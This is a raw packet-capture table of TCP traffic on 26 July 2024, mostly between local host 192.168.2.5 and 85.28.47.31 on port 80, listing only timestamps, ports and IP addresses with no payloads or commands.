Jul 26, 2024 20:09:04.797055960 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.797055960 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.797244072 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.797260046 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.797275066 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.797281981 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.797281981 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.797291994 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.797307968 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.797322035 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.797338009 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.797593117 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.797636032 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.797739029 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.797755003 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.797770023 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.797785997 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.797794104 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.797801018 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.797810078 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.797828913 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.797868967 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.798230886 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.798288107 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.802738905 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.802788019 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.802803993 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.802917004 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.803054094 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.803069115 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.803086996 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.803102970 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.803446054 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.803461075 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.803478003 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.803492069 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.803508997 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.803524971 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.803539991 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.803555012 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.803571939 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.804130077 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.804200888 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.804215908 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.804316998 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.804363012 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.804379940 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.804394960 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.804790020 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.804805994 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.804821968 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.804836988 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.804852962 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.804867983 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.804883003 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.804898024 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.804914951 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.805633068 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.805649042 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.805664062 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.805680037 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.805695057 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.805711031 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.805726051 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.805742025 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.805757999 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.805773973 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.806427956 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.806443930 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.806461096 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.806477070 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.806818008 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.806833029 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.806849957 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.806864977 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.806879997 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.806895018 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.806910038 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.806925058 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.806941986 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.806957960 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.806973934 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.807768106 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.807785034 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.807800055 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.807815075 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.807831049 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.807846069 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.807862043 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.819360018 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.821995974 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:05.264727116 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:05.270617962 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:06.031163931 CEST	49675	443	192.168.2.5	23.1.237.91
Jul 26, 2024 20:09:06.031250954 CEST	49674	443	192.168.2.5	23.1.237.91
Jul 26, 2024 20:09:06.125001907 CEST	49673	443	192.168.2.5	23.1.237.91
Jul 26, 2024 20:09:06.270751953 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:06.270832062 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:06.387221098 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:06.392118931 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:07.336998940 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:07.337110043 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:07.819103956 CEST	443	49703	23.1.237.91	192.168.2.5
Jul 26, 2024 20:09:07.819247961 CEST	49703	443	192.168.2.5	23.1.237.91
Jul 26, 2024 20:09:08.126370907 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:08.132941008 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:08.904242039 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:08.904305935 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:09.699157953 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:09.704133034 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:09.878688097 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:09.878726006 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:09.878806114 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:09.878947973 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:09.878947973 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:09.878982067 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:09.879013062 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:09.879017115 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:09.879046917 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:09.879051924 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:09.879065990 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:09.879127026 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:09.879499912 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:09.879584074 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:09.879807949 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:09.879839897 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:09.879867077 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:09.879873037 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:09.879901886 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:09.879906893 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:09.879920959 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:09.879940987 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:09.879960060 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:09.879991055 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:09.880637884 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:09.880697966 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:09.961772919 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:09.961808920 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:09.961864948 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:09.961879969 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:09.961965084 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:09.962001085 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:09.962023020 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:09.962049961 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:09.962224960 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:09.962282896 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:09.962434053 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:09.962467909 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:09.962491035 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:09.962521076 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:09.962857008 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:09.962892056 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:09.962917089 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:09.962924957 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:09.962955952 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:09.962959051 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:09.962970018 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:09.963006020 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:09.963606119 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:09.963639021 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:09.963660955 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:09.963671923 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:09.963681936 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:09.963705063 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:09.963716984 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:09.963749886 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:09.964436054 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:09.964469910 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:09.964500904 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:09.964510918 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:09.964538097 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:09.964571953 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:09.964587927 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:09.964622974 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:09.965270042 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:09.965303898 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:09.965326071 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:09.965336084 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:09.965348005 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:09.965372086 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:09.965380907 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:09.965404987 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:09.965420008 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:09.965445995 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:09.965465069 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:09.965495110 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:10.047976017 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:10.048032045 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:10.048064947 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:10.048067093 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:10.048106909 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:10.048106909 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:10.048371077 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:10.048404932 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:10.048438072 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:10.048439026 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:10.048466921 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:10.048508883 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:10.048991919 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:10.049026012 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:10.049046993 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:10.049058914 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:10.049069881 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:10.049092054 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:10.049103975 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:10.049135923 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:10.050005913 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:10.050040960 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:10.050059080 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:10.050075054 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:10.050086975 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:10.050108910 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:10.050124884 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:10.050142050 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:10.050160885 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:10.050193071 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:10.050478935 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:10.050508022 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:10.050533056 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:10.050539970 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:10.050551891 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:10.050574064 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:10.050585032 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:10.050606966 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:10.050620079 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:10.050654888 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:10.051328897 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:10.051362991 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:10.051386118 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:10.051395893 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:10.051408052 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:10.051429033 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:10.051440001 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:10.051477909 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:10.052515030 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:10.052551031 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:10.052571058 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:10.052584887 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:10.052598000 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:10.052619934 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:10.052630901 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:10.052653074 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:10.052669048 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:10.052701950 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:10.052983046 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:10.053016901 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:10.053039074 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:10.053050041 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:10.053061008 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:10.053085089 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:10.053114891 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:10.053133011 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:10.053826094 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:10.053860903 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:10.053883076 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:10.053893089 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:10.053909063 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:10.053926945 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:10.053937912 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:10.053958893 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:10.053977966 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:10.053999901 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:10.054649115 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:10.054682970 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:10.054702044 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:10.054717064 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:10.054729939 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:10.054752111 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:10.054764986 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:10.054802895 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:10.055330992 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:10.055366993 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:10.055389881 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:10.055399895 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:10.055412054 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:10.055439949 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:10.055444956 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:10.055471897 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:10.055490017 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:10.055505037 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:10.055526018 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:10.055556059 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:10.056088924 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:10.056122065 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:10.056145906 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:10.056164980 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:10.130258083 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:10.130332947 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:10.130364895 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:10.130363941 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:10.130399942 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:10.130418062 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:10.130422115 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:10.130454063 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:10.130467892 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:10.130505085 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:10.130686998 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:10.130738020 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:10.130810022 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:10.130839109 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:10.130889893 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:10.130924940 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:10.130964041 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:10.131067038 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:10.131594896 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:10.131628036 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:10.131660938 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:10.131665945 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:10.131690979 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:10.131699085 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:10.131720066 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:10.131724119 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:10.131737947 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:10.131757975 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:10.131784916 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:10.131792068 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:10.131803989 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:10.131843090 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:10.132479906 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:10.132555962 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:10.132592916 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:10.132627964 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:10.132649899 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:10.132663012 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:10.132675886 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:10.132699966 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:10.132705927 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:10.132744074 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:10.133323908 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:10.133357048 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:10.133383989 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:10.133390903 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:10.133409023 CEST	49704	80	192.168.2.5	85.28.47.31
